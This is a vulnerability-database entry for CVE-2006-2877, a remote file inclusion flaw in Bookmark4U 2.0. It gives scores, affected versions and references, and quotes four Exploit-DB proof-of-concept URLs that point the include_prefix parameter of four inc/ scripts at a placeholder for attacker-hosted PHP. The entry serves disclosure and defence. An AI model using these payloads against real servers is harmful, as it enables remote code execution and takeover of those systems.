CVE-2006-2877
Published 2006-06-07
Priority: P344, high, 7.5 (CVSS 2.0)
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 7.47% (93.7th percentile)
PHP remote file inclusion vulnerability in Bookmark4U 2.0.0 and earlier allows remote attackers to include arbitrary PHP files via the include_prefix parameter in (1) inc/dbase.php, (2) inc/config.php, (3) inc/common.php, and (4) inc/function.php. NOTE: it has been reported that the inc directory is protected by a .htaccess file, so this issue only applies in certain environments or configurations.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| sangwan_kim | bookmark4u | <= 2.0 | — |
No detection rules found.
Exploit-DB
Bookmark4U 2.0 - '/inc/config.php?env[include_prefix]' Remote File Inclusion
exploitdb·2006-06-05
---
source: https://www.securityfocus.com/bid/18281/info
Bookmark4U is prone to multiple remote file-include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.
An attacker can exploit these issues to include arbitrary remote files containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.
http://www.example.com/[Bookmark4Upath]/inc/config.php?env[include_prefix]=[evil_scripts]
Exploit-DB
Bookmark4U 2.0 - '/inc/function.php?env[include_prefix]' Remote File Inclusion
exploitdb·2006-06-05
---
source: https://www.securityfocus.com/bid/18281/info
http://www.example.com/[Bookmark4Upath]/inc/function.php?env[include_prefix]=[evil_scripts]
Exploit-DB
Bookmark4U 2.0 - '/inc/dbase.php?env[include_prefix]' Remote File Inclusion
exploitdb·2006-06-05
---
source: https://www.securityfocus.com/bid/18281/info
http://www.example.com/[Bookmark4Upath]/inc/dbase.php?env[include_prefix]=[evil_scripts]
Exploit-DB
Bookmark4U 2.0 - '/inc/common.php?env[include_prefix]' Remote File Inclusion
exploitdb·2006-06-05
---
source: https://www.securityfocus.com/bid/18281/info
http://www.example.com/[Bookmark4Upath]/inc/common.php?env[include_prefix]=[evil_scripts]
No writeups or analysis indexed.
References
http://secunia.com/advisories/19758
http://securityreason.com/securityalert/1058
http://securitytracker.com/id?1016224
http://www.osvdb.org/26599
http://www.osvdb.org/26600
http://www.osvdb.org/26601
http://www.osvdb.org/26602
http://www.securityfocus.com/archive/1/435964/100/0/threaded
http://www.securityfocus.com/archive/1/436027/100/0/threaded
http://www.securityfocus.com/bid/18281
https://exchange.xforce.ibmcloud.com/vulnerabilities/26933
Published: 2006-06-07